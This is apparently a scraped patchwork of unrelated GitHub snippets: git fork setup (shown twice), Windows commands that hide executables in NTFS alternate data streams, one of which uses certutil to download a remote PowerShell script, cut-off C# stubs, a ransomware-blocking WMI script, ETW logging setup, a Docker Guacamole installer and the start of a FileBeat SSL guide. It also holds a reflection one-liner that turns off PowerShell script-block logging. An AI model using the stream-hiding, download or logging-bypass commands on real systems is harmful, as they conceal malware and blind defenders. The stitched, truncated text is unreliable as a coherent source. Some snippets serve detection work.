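# Clone your fork over SSH, then register the original repository as "upstream"
# so its history can be fetched and merged into the fork.
git clone git@github.com:YOUR-USERNAME/YOUR-FORKED-REPO.git
cd into/cloned/fork-repo
# Use https:// (or ssh) for upstream, not git://. The git:// transport is
# unauthenticated and unencrypted, so commits fetched over it could be tampered
# with in transit, and GitHub no longer serves that protocol at all.
git remote add upstream https://github.com/ORIGINAL-DEV-USERNAME/REPO-YOU-FORKED-FROM.git
git fetch upstream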
| ###Add content to ADS### | |
| type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" | |
| extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe | |
| findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe | |
| certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | |
| makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab | |
| print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe | |
| reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg | |
| regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey | |
| expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat |
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace BlockDllTest | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |
| # Ransomware Killer v0.1 by Thomas Patzke <[email protected]> | |
| # Kill all parent processes of the command that tries to run "vssadmin Delete Shadows" | |
| # IMPORTANT: This must run with Administrator privileges! | |
| Register-WmiEvent -Query "select * from __instancecreationevent within 0.1 where targetinstance isa 'win32_process' and targetinstance.CommandLine like '%vssadmin%Delete%Shadows%'" -Action { | |
| # Kill all parent processes from detected vssadmin process | |
| $p = $EventArgs.NewEvent.TargetInstance | |
| while ($p) { | |
| $ppid = $p.ParentProcessID | |
| $pp = Get-WmiObject -Class Win32_Process -Filter "ProcessID=$ppid" | |
| Write-Host $p.ProcessID |
# Registers a persistent ETW autologger that starts at boot and subscribes it to
# the provider with GUID {2A576B87-09A7-520E-C21A-4942F0271D67} (the variable name
# suggests this is the Antimalware Scan Interface provider; confirm with
# `logman query providers`). Run from an elevated prompt; the autologger only
# begins collecting after the next reboot.
$AutoLoggerName = 'MyAMSILogger'                      # any name is fine
$AutoLoggerGuid = [guid]::NewGuid().ToString('B')     # 'B' format = brace-wrapped GUID string

New-AutologgerConfig -Name $AutoLoggerName -Guid $AutoLoggerGuid -Start Enabled

$providerArgs = @{
    AutologgerName  = $AutoLoggerName
    Guid            = '{2A576B87-09A7-520E-C21A-4942F0271D67}'
    Level           = 0xff                # every trace level
    MatchAnyKeyword = 0x80000000000001
    Property        = 0x41                # EVENT_ENABLE_PROPERTY_* flags (see evntrace.h); 0x1 is SID
}
Add-EtwTraceProvider @providerArgs
#
# This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
# to bypass Suspicious ScriptBlock Logging for readability.
#
# Defender note: because the call below is written in the clear, the script block containing it is
# presumably itself recorded by ScriptBlock Logging (Microsoft-Windows-PowerShell/Operational event 4104)
# before the field is zeroed, which is the detection opportunity. The write is an in-memory reflection
# call against the running process, so it appears not to persist beyond the current PowerShell session.
#
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.EnterpriseServices; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Cryptography; | |
| /* |
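#!/bin/bash
# Bootstrap Apache Guacamole (guacd + web app) with a MySQL backend using Docker.
# On exit, $mysql_pass holds the root password generated by the mysqld container
# for the steps that follow.
set -euo pipefail

sudo apt-get update
# snap install is not idempotent; skip it when the snap is already present.
snap list docker >/dev/null 2>&1 || sudo snap install docker
sudo docker pull guacamole/guacd
sudo docker pull guacamole/guacamole
# Pull the tag that is actually started below; an untagged pull fetches :latest,
# which this script never runs.
sudo docker pull mysql/mysql-server:5.7
sudo docker run --name=mysqld -d mysql/mysql-server:5.7

# The container's entrypoint logs the generated root password (a line containing
# GENERATED, password in the fifth whitespace-separated field) only once
# initialisation has finished, some seconds after `docker run -d` returns.
# Reading the log a single time therefore races the container and usually leaves
# mysql_pass empty, so poll for the line with a bounded wait.
mysql_pass=
for ((attempt = 0; attempt < 60; attempt++)); do
  mysql_pass=$(sudo docker logs mysqld 2>&1 | awk '/GENERATED/ {print $5}')
  [[ -n "$mysql_pass" ]] && break
  sleep 2
done
# Abort here rather than continuing with an empty password into later steps.
: "${mysql_pass:?generated MySQL root password not found in the mysqld container log}"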
| #Requirements: | |
| #1) choco install git.install | |
| $evtx_samples_path = "C:\EVTX-ATTACK-SAMPLES" | |
| $winlogbeat_url = "https://storage.googleapis.com/beats-ci-artifacts/snapshots/winlogbeat/winlogbeat-oss-8.0.0-SNAPSHOT-windows-x86_64.zip" | |
| $winlogbeat_path = "C:\winlogbeat-8.0.0-SNAPSHOT-windows-x86_64" | |
| #get evtx repo | |
| if (-not (Test-Path $evtx_samples_path)) { | |
| Git clone https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES.git $evtx_samples_path |
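# Clone your fork over SSH, then register the original repository as "upstream"
# so its history can be fetched and merged into the fork.
git clone git@github.com:YOUR-USERNAME/YOUR-FORKED-REPO.git
cd into/cloned/fork-repo
# Use https:// (or ssh) for upstream, not git://. The git:// transport is
# unauthenticated and unencrypted, so commits fetched over it could be tampered
# with in transit, and GitHub no longer serves that protocol at all.
git remote add upstream https://github.com/ORIGINAL-DEV-USERNAME/REPO-YOU-FORKED-FROM.git
git fetch upstream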
How to configure SSL for FileBeat and Logstash step by step with OpenSSL (Create CA, CSRs, Certificates, etc).
The Elasticsearch documentation "Securing Communication With Logstash by Using SSL" does not show how to create, with openssl, the keys and certificates needed for mutual authentication between FileBeat (output) and Logstash (input). It is not a difficult task, but it can be very tedious if you are not familiar with openssl.
These are some errors that can be found in the FileBeat and Logstash logs when SSL is not properly configured.
# FileBeat.